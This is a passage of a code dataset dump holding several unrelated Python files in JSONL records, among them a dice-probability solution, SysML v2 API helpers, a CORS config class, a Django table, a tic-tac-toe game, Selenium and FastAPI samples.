-*- coding: utf-8 -*-\n# @author: SaltFish\n# @file: 60n个骰子的点数.py\n# @date: 2020/07/24\n\"\"\"\nThrow n dice on the ground; the sum of the points on the upward faces is s. Given n, print the probability of every possible value of s.\n\nReturn the answer as an array of floats, where the i-th element is the probability of the i-th smallest value among all sums the n dice can produce.\n\nExample 1:\n\nInput: 1\nOutput: [0.16667,0.16667,0.16667,0.16667,0.16667,0.16667]\nExample 2:\n\nInput: 2\nOutput: [0.02778,0.05556,0.08333,0.11111,0.13889,0.16667,0.13889,0.11111,0.08333,0.05556,0.02778]\n\nDynamic programming\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def twoSum(self, n: int) -> List[float]:\n dp = [[0 for _ in range(6 * n + 1)] for _ in range(n + 1)]\n for i in range(1, 7):\n dp[1][i] = 1\n\n # with i dice in play\n for i in range(2, n + 1):\n # j is the sum of the i dice\n for j in range(i, i * 6 + 1):\n # k is the value of the current die\n for k in range(1, 7):\n if j >= k + 1:\n dp[i][j] += dp[i - 1][j - k]\n total, res = pow(6, n), []\n for i in range(n, n * 6 + 1):\n res.append(dp[n][i] * 1.0 / total)\n return res\n\n def twoSum_better(self, n: int) -> List[float]:\n dp = [0 for _ in range(6 * n + 1)] # index 0 is unused; the largest index used is 6*n\n for i in range(1, 7): # initialize dp with the first throw\n dp[i] = 1\n # start counting from the second throw\n for i in range(2, n + 1):\n # the minimum sum with i throws is i; update the counts from large to small\n for j in range(6 * n, i - 1, -1):\n dp[j] = 0 # dp[j] must be rebuilt from 0 on every throw; the count of each sum is recomputed\n # the value contributed by the current throw\n for k in range(1, 7):\n # the minimum sum of the previous round is i-1\n if j - k < i - 1:\n break\n # update the current round from the previous round\n dp[j] += dp[j - k]\n total, res = pow(6, n), []\n for i in range(n, 6 * n + 1):\n res.append(dp[i] * 1.0 / total)\n return res\n","repo_name":"SaItFish/PySundries","sub_path":"algorithm_questions/LeetCode/剑指Offer/60n个骰子的点数.py","file_name":"60n个骰子的点数.py","file_ext":"py","file_size_in_byte":2262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12552004723","text":"import requests\nimport json\nimport tkinter as tk\nfrom tkinter import *\nfrom tkinter import messagebox\nfrom tkinter import ttk\nfrom functools import partial\n\n\ndef format_servername(cName):\n if len(cName)>0:\n if cName[len(cName)-1] == '/':\n cName = cName[0:(len(cName)-1)]\n \n if cName.find('http') == -1:\n cName = 'http://' + cName\n \n return cName\n \ndef delete_project(cServerName, cProjectID):\n##Deletion does not work for non-empty projects, so we will just set the name to None in that case\n bSuccess = True\n response = requests.delete(cServerName + \"/projects/\" + cProjectID)\n if response.status_code!=200:\n \n response = requests.get(cServerName + '/projects/' + cProjectID)\n if response.status_code!=200: \n bSuccess = False\n else:\n default_branch_id = response.json().get('defaultBranch').get('@id')\n project_data = {\n \"@type\": \"Project\",\n \"defaultBranch\":{\"@id\": default_branch_id},\n \"name\": None}\n\n response = requests.put(cServerName + \"/projects/\"+cProjectID, \n headers={\"Content-Type\": \"application/json\"}, \n data=json.dumps(project_data))\n \n if response.status_code!=200: \n bSuccess = False\n\n return bSuccess\n\n\ndef multi_page_http_get (sUrl):\n # Processes pagination in http responses and returns the full data from all \n # pages and the response from getting the last page\n response = requests.get(sUrl)\n data = response.json()\n\n # Handle next pages of multi-page HTTP responses (when the payload is very large)\n while response.headers.get('Link','--NOTFOUND--').find('?page[after]')>-1:\n cLink = response.headers.get('Link')\n iPos = cLink.find(',')\n if iPos > -1:\n cLink = cLink[0:iPos]\n cNextPageLink = cLink.replace('<','').replace('; rel=\"next\"','').replace('; rel=\"prev\"','').replace('>','')\n response = requests.get(cNextPageLink)\n if 
response.status_code == 200:\n data = data + response.json()\n else:\n break\n \n return response, data\n\n\ndef read_full_repository(cServerName, cProjectID):\n# This function has been created to demonstrate the handling\n# of multiple HTTP response pages.\n#\n# Normally, this function should not be used, but queries \n# for subsets of the repository should be used instead.\n bSuccess = True\n data = []\n try:\n response = requests.get(cServerName + \"/projects/\" + cProjectID)\n except requests.exceptions.ConnectionError:\n bSuccess = False\n cErrorMessage = 'Error: Could not connect to server'\n print(cErrorMessage)\n\n \n if bSuccess and response.status_code!=200:\n bSuccess = False\n cErrorMessage = 'Error: Could not find project on stated host'\n print(cErrorMessage)\n\n \n if bSuccess:\n data = response.json()\n oDefaultBranch = data.get('defaultBranch')\n if oDefaultBranch is None:\n bSuccess = False\n cErrorMessage = 'Error: No default branch.'\n print(cErrorMessage)\n else:\n sDefaultBranchId = oDefaultBranch.get('@id')\n \n if bSuccess:\n response = requests.get(cServerName + \"/projects/\" + cProjectID + \"/branches/\" + sDefaultBranchId)\n data = response.json()\n oHeadCommit = data.get('head')\n if oHeadCommit is None:\n bSuccess = False\n cErrorMessage = 'Error: No commit found.'\n print(cErrorMessage)\n else:\n sHeadCommit = oHeadCommit.get('@id')\n\n\n data = []\n if bSuccess:\n response, data = multi_page_http_get(cServerName + \"/projects/\" + cProjectID + \"/commits/\"+sHeadCommit+\"/elements\")\n\n return data\n\ndef run_query_for_elementtyp(cElementType, cServerName, cProjectID):\n qresponse_json=json.dumps('')\n qinput = {\n '@type':'Query',\n 'select': ['name','@id','@type','owner'],\n 'where': {\n '@type': 'CompositeConstraint',\n 'operator': 'and',\n 'constraint': [\n {\n '@type': 'PrimitiveConstraint',\n 'inverse': False,\n 'operator': '=',\n 'property': '@type',\n 'value': cElementType\n }\n ]\n }\n }\n\n payload = json.dumps(qinput)\n qurl = f\"{cServerName}/projects/{cProjectID}/query-results\"\n qresponse = requests.post(qurl, json=qinput)\n if qresponse.status_code == 200:\n qresponse_json = qresponse.json()\n\n return qresponse_json\n \ndef processProjectSelection(listWindow,theCombo,cProjectID):\n selectedProject = theCombo.get()\n posOpeningParenthesis = selectedProject.find('(')\n posClosingParenthesis = selectedProject.find(')')\n cProjectID.set(selectedProject[(posOpeningParenthesis+1):posClosingParenthesis])\n listWindow.destroy()\n\n \ndef selectproject(cProjectID, cServerName):\n tdata = []\n cProjectID.set(\"\")\n try:\n response, data = multi_page_http_get(format_servername(cServerName.get()) + \"/projects\")\n\n for currentRecord in data:\n if str(currentRecord.get('name'))!=\"None\":\n tdata.append(currentRecord.get(\"name\") + \" (\" + currentRecord.get(\"@id\") + \")\" )\n except requests.exceptions.ConnectionError:\n cProjectID.set(\"Cannot connect to server.\")\n \n if len(tdata)>0:\n listWindow = Tk()\n listWindow.title(\"Project Selection\")\n frm = ttk.Frame(listWindow)\n frm.grid(row=0, column=0, columnspan=4)\n ttk.Label(frm, text=\"Select project\").grid(column=0, row=0)\n theCombo=ttk.Combobox(frm, values=tdata, width = 100)\n theCombo.grid(column=1, row=1)\n ttk.Button(frm, text=\"OK\", command=partial(processProjectSelection,listWindow,theCombo,cProjectID)).grid(column=3, row=2)\n ttk.Button(frm, text=\"Cancel\", command=listWindow.destroy).grid(column=2, 
row=2)\n\n listWindow.mainloop() \n\ndef dictionary_payload_partusage(element_id, name = None, quali_name = None, owner = None, owning = None):\n dictionary_payload_partusage = {\n \"payload\": {\n '@type': 'PartUsage',\n '@id': element_id,\n 'elementId': element_id,\n 'name': name,\n 'owner': owner,\n 'owningMembership': owning,\n 'owningNamespace': owner,\n 'owningRelationship': owning,\n 'qualifiedName': quali_name\n },\n \"identity\": {\"@id\": element_id}\n }\n return dictionary_payload_partusage\n\ndef dictionary_payload_owningmembership(element_id, member_element, memberId, owned_member_element, owned_member_element_id, target, name, owner):\n dictionary_payload_owningmembership = {\n \"payload\": {'@type': 'OwningMembership',\n '@id': element_id,\n 'elementId': element_id,\n 'memberElement': member_element,\n 'memberElementId': memberId,\n 'memberName': name,\n 'membershipOwningNamespace': owner,\n 'ownedMemberElement': owned_member_element ,\n 'ownedMemberElementId': owned_member_element_id,\n 'ownedMemberName': name,\n 'ownedRelatedElement': [owned_member_element],\n 'owningRelatedElement': owner,\n 'relatedElement': [owner, owned_member_element],\n 'source': [owner],\n 'target': [target]\n },\n \"identity\": {\"@id\": element_id}\n }\n return dictionary_payload_owningmembership\n\ndef dictionary_payload_package(element_id, name = None, quali_name = None, member = None, membership = None ):\n dictionary_payload_package = {\n \"payload\": {'@type': 'Package',\n '@id': element_id,\n 'elementId': element_id,\n 'member': member,\n 'membership': membership,\n 'name': name,\n 'ownedElement': member,\n 'ownedMember': member,\n 'ownedMembership': membership,\n 'ownedRelationship': membership,\n 'qualifiedName': quali_name\n },\n \"identity\": {\"@id\": element_id}\n }\n return dictionary_payload_package\n\ndef copy_elements(source_host, source_id, target_host, target_id):\n \n rep = read_full_repository(source_host, source_id)\n \n rep_t = []\n for i in range(len(rep)):\n rep_t.append({\"payload\": rep[i],\n \"identity\": {\"@id\": rep[i]['@id']}})\n \n commit_body1 = '{\"change\":' + json.dumps(rep_t) + '}'\n response = requests.post(target_host + \"/projects/\" +target_id+ \"/commits\", headers={\"Content-Type\": \"application/json\"}, data = commit_body1)\n \n if response.status_code != 200:\n return False , response.json()\n else:\n return True , response.json()\n\ndef dictionary_payload_dependency(element_id, client, owner, membership, quali_name, target):\n dictionary_payload_dependency = {\n \"payload\": {'@type': 'Dependency',\n '@id': element_id,\n 'client': [client],\n 'elementId': element_id,\n 'owner': owner,\n 'owningMembership': membership,\n 'owningNamespace': owner,\n 'owningRelationship': membership,\n 'qualifiedName': quali_name,\n 'relatedElement': [client, target],\n 'source': [client],\n 'supplier': [target],\n 'target': [target]\n },\n \"identity\": {\"@id\": element_id}\n }\n return dictionary_payload_dependency","repo_name":"GfSE/fas4sysmlv2","sub_path":"src/core/fas4sysmlv2API_helpers.py","file_name":"fas4sysmlv2API_helpers.py","file_ext":"py","file_size_in_byte":10171,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"77"} +{"seq_id":"28999528142","text":"from __future__ import print_function\n\nimport json\n\n\nclass FDSCORSConfig(dict):\n '''\n cors config like this:\n\n {\n \"rules\": [\n {\n \"id\": \"0\",\n \"allowOrigin\":\"*.example.com\"\n },\n {\n \"id\": \"1\",\n \"allowOrigin\":\"*\"\n }\n ]\n }\n '''\n\n def 
__init__(self, json={}):\n dict.__init__(self, json)\n self._rules = []\n for rule in self.get('rules', []):\n self._rules.append(FDSCORSRule(rule))\n self['rules'] = self._rules\n\n @property\n def rules(self):\n return self._rules\n\n def get_rule_by_id(self, id):\n for rule in self.rules:\n if rule.id == id:\n return rule\n return None\n\nclass FDSCORSRule(dict):\n def __init__(self, json = {}):\n dict.__init__(self, json)\n\n @property\n def id(self):\n return self.get('id', None)\n\n @id.setter\n def id(self, id):\n self['id'] = id\n\n @property\n def allowOrigin(self):\n return self.get('allowOrigin', None)\n\n @allowOrigin.setter\n def allowOrigin(self, allowOrigin):\n self['allowOrigin'] = allowOrigin\n\n\n\nif __name__ == '__main__':\n cors_config = FDSCORSConfig()\n rule1 = FDSCORSRule()\n rule1.allowOrigin = '*.example.com'\n\n print(json.dumps(rule1, sort_keys=True))\n\n cors_config.rules.append(rule1)\n\n print(json.dumps(cors_config, sort_keys=True))\n\n cors_config.rules.append(rule1)\n print(json.dumps(cors_config, sort_keys=True))\n\n jsonstr = ''' {\n \"rules\": [\n {\n \"id\": \"0\",\n \"allowOrigin\":\"*.example.com\"\n },\n {\n \"id\": \"1\",\n \"allowOrigin\":\"*\"\n }\n ]\n }\n '''\n print(jsonstr)\n print(json.dumps(json.loads(jsonstr), sort_keys=True))\n print(json.dumps(FDSCORSConfig(json.loads(jsonstr)), sort_keys=True))\n","repo_name":"XiaoMi/galaxy-fds-sdk-python","sub_path":"fds/model/fds_cors.py","file_name":"fds_cors.py","file_ext":"py","file_size_in_byte":1704,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"77"} +{"seq_id":"10863949016","text":"import django_tables2 as tables\nfrom django.template.defaultfilters import truncatechars\nfrom django.utils.html import format_html\nfrom django_tables2.utils import A\n\nfrom .models import Sample\nfrom .utils import humansize\n\n\nclass SampleTable(tables.Table):\n edit = tables.LinkColumn(\n \"label\", text=\"Edit Labels\", args=[A(\"pk\")], orderable=False\n )\n labels = tables.Column(accessor=\"pk\", orderable=True)\n\n class Meta:\n model = Sample\n template_name = \"django_tables2/bootstrap4.html\"\n attrs = {\"class\": \"table table-sm table-bordered\"}\n fields = (\n \"edit\",\n \"labels\",\n \"url\",\n \"freeze_time\",\n \"freeze_software\",\n \"page_size\",\n \"notes\",\n )\n\n def render_labels(self, value, record):\n default = format_html('-')\n if hasattr(record, \"labeled_sample\"):\n # This was a one-to-one relationship but is now a FK relationship so there can be more than 1\n # LabeledSample for the Sample. 
However the default filtering is superseded_by=None so only 1 is returned.\n if record.labeled_sample.all().exists():\n labeled_elements = (\n record.labeled_sample.all().first().labeled_elements.all()\n )\n labels = labeled_elements.values_list(\n \"label__slug\", flat=True\n ).distinct()\n if labels:\n label_links = [\n f'{label}' for label in labels\n ]\n return format_html(\", \".join(label_links))\n return default\n\n def order_labels(self, queryset, is_descending):\n queryset = queryset.order_by((\"-\" if is_descending else \"\") + \"nlabels\")\n return (queryset, True)\n\n def render_page_size(self, value, record):\n return humansize(value)\n\n def render_url(self, value, record):\n return f\"{truncatechars(value, 80)}\"\n","repo_name":"mozilla-applied-ml/fta","sub_path":"fta/samples/tables.py","file_name":"tables.py","file_ext":"py","file_size_in_byte":2051,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"1154668336","text":"import sys\nsys.stdin = open(\"input.txt\", 'r')\ninput = sys.stdin.readline\n\nimport itertools\n\nN = int(input().rstrip())\nS = []\nfor i in range(N):\n S.append(input().rstrip())\n\nfor a, b in itertools.combinations_with_replacement(S, 2):\n if a == b[::-1]:\n print(len(a), a[len(a)//2])","repo_name":"hjyoon/baekjoon-answers","sub_path":"_9000/9933.py","file_name":"9933.py","file_ext":"py","file_size_in_byte":291,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"71321038968","text":"\nimport numpy as np\nfrom colorama import Back\nfrom .UT3Logic import Board, b_sz\nfrom Arena import numPlayers\nfrom Game import Game\nimport sys\nsys.path.append('..')\n\n\nclass UT3Game(Game):\n def __init__(self, n=b_sz):\n self.n = n\n\n def getArray(self, b):\n macro = np.tile(b.macro, (self.n, self.n))\n return np.stack((b.pieces, macro))\n\n def getBoardChannels(self):\n return 2\n\n def getBoardSize(self):\n return self.n**2, self.n**2\n\n def getActionSize(self):\n return self.n**4\n\n def getInitBoard(self):\n b = Board(self.n)\n return self.getArray(b)\n\n def getNextState(self, board, player, action):\n b = Board(self.n)\n b.pieces = np.copy(board[0])\n b.macro = np.copy(board[1, :b_sz, :b_sz])\n move = int(action/self.n**2), action % self.n**2\n b.execute_move(move, player)\n if player+1 <= numPlayers:\n player = player+1\n else:\n player = 1\n return self.getArray(b), player\n\n def getValidMoves(self, board, player):\n valid = [0]*self.getActionSize()\n b = Board(self.n)\n b.pieces = np.copy(board[0])\n b.macro = np.copy(board[1, :b_sz, :b_sz])\n for x, y in b.get_legal_moves(player):\n valid[x*self.n**2 + y] = 1\n return np.array(valid)\n\n def getGameEnded(self, board, player):\n # Return 0 if not ended, 1 if player 1 won, -1 if player 1 lost.\n # Return small non-zero value for a draw.\n b = Board(self.n)\n b.pieces = np.copy(board[0])\n b.macro = np.copy(board[1, :b_sz, :b_sz])\n\n insides = b.getInnerBoards(b.macro)\n\n for i in range(len(insides)):\n for player in range(1, numPlayers+1):\n if b.is_win(player, insides[i]):\n return player\n if b.is_full():\n return b.draw\n return 0\n\n def getCanonicalForm(self, board, player):\n arr = []\n arr.append(np.where(board[0] > 0, (board[0] % numPlayers)+1, board[0]))\n arr.append(board[1])\n # np.where((board >= 1.0) & (board < numPlayers+1), (board%numPlayers)+1 , board)\n return np.array(arr)\n\n def getSymmetries(self, board, pi):\n # rotate, mirror\n assert(len(pi) == 
self.getActionSize()) # 1 for pass\n pi_board = np.reshape(pi, self.getBoardSize())\n sym, x, y = [], -2, -1\n\n for rot in range(4):\n for flip in True, False:\n newB = np.rot90(board, rot, (x, y))\n newPi = np.rot90(pi_board, rot, (x, y))\n if flip:\n newB = np.flip(newB, y)\n newPi = np.flip(newPi, y)\n sym.append((newB, list(newPi.ravel())))\n return sym\n\n def stringRepresentation(self, board):\n return board.tostring()\n\n\ndef display(board, indent=' '):\n b = Board(b_sz)\n b.pieces = np.copy(board[0])\n b.macro = np.copy(board[1, :b_sz, :b_sz])\n\n top = ' '\n sep = '|'\n msep = '‖ '\n rowSep = ' ' + ('---' + '+---'*(b_sz-1) + '‖') * \\\n (b_sz-1) + '---' + '+---'*(b_sz-1)\n rows = []\n idex = []\n jdex = []\n windex = []\n minirows = []\n mw = []\n\n for i in range(b_sz):\n for j in range(b_sz):\n bp = b.macro[i][j]\n\n if bp in range(1, 4):\n idex.append(i)\n jdex.append(j)\n mw.append(bp)\n\n windex.append(tuple((i, j)))\n\n print('')\n\n for x in range(b_sz):\n for y in range(b_sz):\n adder = ''\n\n for xX in range(b_sz):\n\n minirow = ''\n\n for yY in range(b_sz):\n\n if ((y*b_sz+yY) % (b_sz) == b_sz-1):\n if (y == b_sz-1) & (yY == b_sz-1):\n sep = ' '\n else:\n sep = '‖'\n else:\n sep = '|'\n\n if (x, y) in windex:\n dex = windex.index((x, y))\n\n mask = mw[dex]\n\n if mask == 1:\n adder = Back.RED + str(b.pieces[x*b_sz+xX][y*b_sz+yY]).replace(\n '1.0', ' X ').replace('2.0', ' O ').replace('3.0', ' ^ ') + Back.RESET\n elif mask == 2:\n adder = Back.BLUE + str(b.pieces[x*b_sz+xX][y*b_sz+yY]).replace(\n '1.0', ' X ').replace('2.0', ' O ').replace('3.0', ' ^ ') + Back.RESET\n elif mask == 3:\n adder = Back.GREEN + str(b.pieces[x*b_sz+xX][y*b_sz+yY]).replace(\n '1.0', ' X ').replace('2.0', ' O ').replace('3.0', ' ^ ') + Back.RESET\n\n else:\n temp = b.pieces[x*b_sz+xX][y*b_sz+yY]\n\n if temp == 1.0:\n adder = Back.RED + \\\n str(b.pieces[x*b_sz+xX][y*b_sz+yY]\n ).replace('1.0', ' X ') + Back.RESET\n elif temp == 2.0:\n adder = Back.BLUE + \\\n str(b.pieces[x*b_sz+xX][y*b_sz+yY]\n ).replace('2.0', ' O ') + Back.RESET\n elif temp == 3.0:\n adder = Back.GREEN + \\\n str(b.pieces[x*b_sz+xX][y*b_sz+yY]\n ).replace('3.0', ' ^ ') + Back.RESET\n else:\n adder = str(b.pieces[x*b_sz+xX][y*b_sz+yY])\n\n minirow += adder + sep\n\n minirows.append(minirow)\n\n t = 0\n\n for r in range(b_sz**2):\n if r < 10:\n row = ' ' + str(r) + ' '\n\n if r % b_sz == b_sz-1:\n top += str(r) + ' ' + msep\n else:\n top += str(r) + ' | '\n else:\n row = str(r) + ' '\n\n if r % b_sz == b_sz-1:\n if r == (b_sz**2)-1:\n top += str(r)\n else:\n top += str(r) + msep\n else:\n top += str(r) + '| '\n\n for c in range(b_sz):\n\n t = (r*b_sz)+(c*b_sz)-(r % b_sz)*(b_sz-1)\n\n row += minirows[t]\n \"\"\"if r in range(b_sz):\n \t\t\tt = r+c*b_sz\n \t\t\trow += minirows[t]\n \t\telif r in range(b_sz, b_sz*(b_sz-1)):\n \t\t\tt = r+(b_sz**2)+c*b_sz-3\n \t\t\trow += minirows[t]\n \t\telse:\n \t\t\tt = r+(b_sz**2)+(c*b_sz)+b_sz\n \t\t\trow += minirows[t]\"\"\"\n\n rows.append(row)\n\n if r % b_sz == b_sz-1:\n if (r != 0) & (r != (b_sz**2)-1):\n rows.append(' ' + ('='*((4*b_sz)-1) + '#')\n * (b_sz-1) + '='*((4*b_sz)-1))\n else:\n rows.append(rowSep)\n\n print(top)\n\n print('')\n\n for b in range(len(rows)):\n print(rows[b].replace('0.0', ' . 
'))\n\n \"\"\"for rn in range(b_sz**2):\n \t row = ''\n \t sep = '|'\n \t mSep = '‖ '\n \t \n \t if rn < 10:\n \t \trow += ' ' + str(rn) + ' '\n \t \t\n \t \tif rn%b_sz == b_sz-1:\n \t \t\ttop += str(rn) + ' ' + mSep\n \t \telse:\n \t \t\ttop += str(rn) + ' | '\n \t else:\n \t \trow += str(rn) + ' '\n \t \t\n \t \tif rn%b_sz == b_sz-1:\n \t \t\tif rn == (b_sz**2)-1:\n \t \t\t\ttop += str(rn)\n \t \t\telse:\n \t \t\t\ttop += str(rn) + mSep\n \t \telse:\n \t \t\ttop += str(rn) + '| '\n \t \n \t for cn in range(b_sz**2):\n \t \tif cn%b_sz == b_sz-1:\n \t \t\tif cn==(b_sz**2)-1:\n \t \t\t\tsep = ''\n \t \t\telse:\n \t \t\t\tsep = '‖'\n \t \telse:\n \t \t\tsep = '|'\n \t\n \t \tif (idex > 0) & (jdex > 0):\n \t \t\tif (rn in range(b_sz*idex, b_sz*idex+b_sz)) & (cn in range(b_sz*jdex, b_sz*jdex+b_sz)):\n \t \t\t\t# print(\"({}, {}) {}\".format(idex, jdex, mw))\n \t \t\t\tif mw == 1:\n \t \t\t\t\trow += Back.RED + str(b.pieces[rn, cn]).replace('1.0', ' X ').replace('2.0', ' O ').replace('3.0', ' ^ ') + Back.RESET + sep\n \t \t\t\telif mw == 2:\n \t \t\t\t\trow += Back.BLUE + str(b.pieces[rn, cn]).replace('2.0', ' O ').replace('3.0', ' ^ ').replace('1.0', ' X ') + Back.RESET + sep\n \t \t\t\telif mw == 3:\n \t \t\t\t\trow += Back.GREEN + str(b.pieces[rn, cn]).replace('3.0', ' ^ ').replace('2.0', ' O ').replace('1.0', ' X ') + Back.RESET + sep\n \t \t\telse:\n \t \t\t\ttemp = b.pieces[rn, cn]\n \t \t\t\t\n \t \t\t\tif temp == 1.0:\n \t \t\t\t\trow += str(b.pieces[rn, cn]).replace('1.0', Back.RED + ' X ' + Back.RESET) + sep\n \t \t\t\telif temp == 2.0:\n \t \t\t\t\trow += str(b.pieces[rn, cn]).replace('2.0', Back.BLUE + ' O ' + Back.RESET) + sep\n \t \t\t\telif temp == 3.0:\n \t \t\t\t\trow += str(b.pieces[rn, cn]).replace('3.0', Back.GREEN + ' ^ ' + Back.RESET) + sep\n \t \t\t\telse:\n \t \t\t\t\trow += str(b.pieces[rn, cn]) + sep\n \t \telse:\n \t \t\ttemp = b.pieces[rn, cn]\n \t \t\t\t\n \t \t\tif temp == 1.0:\n \t \t\t\trow += str(b.pieces[rn, cn]).replace('1.0', Back.RED + ' X ' + Back.RESET) + sep\n \t \t\telif temp == 2.0:\n \t \t\t\trow += str(b.pieces[rn, cn]).replace('2.0', Back.BLUE + ' O ' + Back.RESET) + sep\n \t \t\telif temp == 3.0:\n \t \t\t\trow += str(b.pieces[rn, cn]).replace('3.0', Back.GREEN + ' ^ ' + Back.RESET) + sep\n \t \t\telse:\n \t \t\t\trow += str(b.pieces[rn, cn]) + sep\n \n \t if rn%b_sz == 0:\n \t\t if rn != 0:\n \t\t \trows.append(' ' + ('='*((b_sz**2)-1) + '#')*(b_sz-1) + '='*((4*b_sz)-1))\n \t else:\n \t \t rows.append(rowSep)\n \t\n \t rows.append(row) #replace('1.0', Back.RED + ' X ' + Back.RESET).replace('2.0', Back.BLUE + ' O ' + Back.RESET).replace('3.0', Back.GREEN + ' ^ ' + Back.RESET).replace('0.0',' ')) #replace('1.0', ' X ').replace('2.0', ' O ').replace('3.0', ' ^ '))\n \t \n print(top)\n \n for i in range(len(rows)):\n \tprint(rows[i].replace('0.0', ' . 
'))\"\"\"\n\n \"\"\"print('')\n # print(indent + ' 0 | 1 | 2 ‖ 3 | 4 | 5 ‖ 6 | 7 | 8')\n topRow = ' '\n for i in range(b_sz):\n \tfor j in range(b_sz):\n \t\ttopRow += str(i*b_sz + j)\n \t\tif i*b_sz + j < 10:\n \t\t\ttopRow += ' '\n \t\tif j != b_sz - 1:\n \t\t\ttopRow += '| '\n \t\telif i != b_sz - 1:\n \t\t\ttopRow += '‖ '\n print(indent + topRow)\n print('')\n \n for n, row in enumerate(board[0]):\n if n:\n if n % b_sz:\n sep = '---' + '+---'*(b_sz-1)\n \n fullPrint = ' - '\n for i in range(b_sz):\n \tfullPrint += sep\n \tif i != b_sz - 1:\n \t\tfullPrint += '‖'\n print(indent + fullPrint)\n # print(indent + '- ' + sep + '‖' + sep + '‖' + sep)\n else:\n sep = '='*(4*b_sz - 1)\n \n fullPrint = ' = '\n for i in range(b_sz):\n \tfullPrint += sep\n \tif i != b_sz - 1:\n \t\tfullPrint += '#'\n print(indent + fullPrint)\n # print(indent + '= ' + sep + '#' + sep + '#' + sep)\n row = '‖'.join('|'.join(map(str, map(int, row[i:i+b_sz]))) for i in range(0, len(row), b_sz))\n adjustedIndent = indent\n if n < 10:\n \tadjustedIndent += ' '\n print(adjustedIndent + str(n) + ' ' + row.replace('1', Back.BLUE + ' O ' + Back.RESET).replace('2', Back.RED + ' X ' + Back.RESET).replace('3', Back.GREEN + ' ^ ' + Back.RESET).replace('0',' . '))\"\"\"\n print('')\n","repo_name":"YasmineFA/CS534_Team2","sub_path":"ut3/UT3Game.py","file_name":"UT3Game.py","file_ext":"py","file_size_in_byte":11446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"75152049207","text":"#!/usr/bin/env python3\n\"\"\"Setup downloader-cli\"\"\"\n\nimport io\nfrom setuptools import setup\n\n\nrequirements = [\n 'urllib3>=1.25.6'\n]\n\n\n\nsetup(\n name=\"downloader_cli\",\n version=\"0.3.3\",\n url=\"https://github.com/CS222-UIUC/course-project-group-13\",\n packages=[\"downloader_cli\"],\n classifiers=(\n [\n \"Programming Language :: Python :: 3\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: OS Independent\",\n ]\n ),\n entry_points={\n 'console_scripts': [\n \"dw = downloader_cli.download:main\"\n ]\n },\n install_requires=requirements,\n)\n","repo_name":"CS222-UIUC/course-project-group-13","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31761547580","text":"from time import sleep\nfrom poium import Page, Element, Elements\nfrom poium import Browser\nfrom selenium import webdriver\n\n# page层定义\nclass BaiduPage(Page):\n input = Element(id_=\"kw\", describe=\"搜索输入框\")\n button = Element(id_=\"su\", describe=\"搜索按钮\")\n results = Elements(xpath=\"//div/h3/a\", describe=\"搜索结果\")\n\n\ndr = webdriver.Chrome(r'D:\\Work\\QA\\selenium\\webdriver\\chromedriver.exe')\npage = BaiduPage(dr)\npage.get(\"https://www.baidu.com\")\npage.input.send_keys(\"baidu\")\npage.button.click()\nsleep(2)\n\nelem = page.results\nfor e in elem:\n print(e.text)\n\ndr.close()","repo_name":"King-Zeno/alw_selenium","sub_path":"demo1/testpoium.py","file_name":"testpoium.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29393621329","text":"def levenshtein(palab1, palab2):\n res=dict()\n for i in range(len(palab1) + 1):\n res[i]=dict()\n res[i][0]=i\n for i in range(len(palab2) + 1):\n res[0][i] = i\n for i in range(1, len(palab1) + 1):\n for j in range(1, len(palab2) + 1):\n res[i][j] = min(res[i][j-1] + 1, res[i-1][j] + 1, 
res[i-1][j-1] + (not palab1[i - 1] == palab2[j - 1]))\n\n a = res[len(palab1)][len(palab2)]\n if a==0:\n return \"0D\"\n if a>1:\n return \"+1\"\n\n if a==1:\n # distance 1 with equal lengths is always a single substitution;\n # otherwise exactly one character was inserted or deleted\n if len(palab1)==len(palab2):\n return \"1S\"\n else:\n return \"IB\"\n\nif __name__ == \"__main__\":\n pal1=input(\"Ingrese palabra 1: \")\n pal2 = input(\"Ingrese palabra 2: \")\n print(levenshtein(pal1,pal2))","repo_name":"pabloschwarzenberg/grader","sub_path":"tema10_ej2/tema10_ej2_0c9c85fc2ebfcf19c19d03e86871a390.py","file_name":"tema10_ej2_0c9c85fc2ebfcf19c19d03e86871a390.py","file_ext":"py","file_size_in_byte":772,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"69991695610","text":"#! /usr/bin/python\n\nimport ff\n\nif __name__ == \"__main__\":\n (opt, args) = ff.parse_args()\n \n btn = [(50,170),\n (50,200),\n (50,230),\n (50,260)]\n\n # default\n if not opt.url:\n opt.url = \"../tests/button_test.html\"\n\n win = ff.launch(opt.profile, opt.url)\n \n c = ff.cmd()\n for (x,y) in btn:\n c.click(x,y)\n c.execute(win)\n\n win.close()\n ff.done()","repo_name":"haowu4682/repair","sub_path":"code/undosys/firefox/auto/test_btn.py","file_name":"test_btn.py","file_ext":"py","file_size_in_byte":419,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"17116512393","text":"import json\r\nfrom typing import List\r\nfrom uuid import uuid4\r\nfrom fastapi import FastAPI, Request\r\nfrom pydantic import BaseModel\r\nfrom datetime import datetime\r\n\r\napp = FastAPI() # Variable that holds the application\r\n\r\n# Notes:\r\n# 1) In Python, the convention is that every class name starts with an uppercase letter.\r\n# 2) Variable names are usually separated with the underscore character ( \"_\" ).\r\n# 3) Route names match the method names to make the code and the API easier to read.\r\n# 4) Variables with the \"arm\" prefix are used to store the data\r\n\r\n\r\nclass Manutencao(BaseModel): # Structure of the maintenance data\r\n\r\n id_manutencao: str\r\n\r\n data_hora_inicio_manutencao: str = None\r\n data_hora_fim_manutencao: str = None \r\n data_hora_chegada_veiculo: str = None\r\n\r\n data_hora_criacao_registro: str = 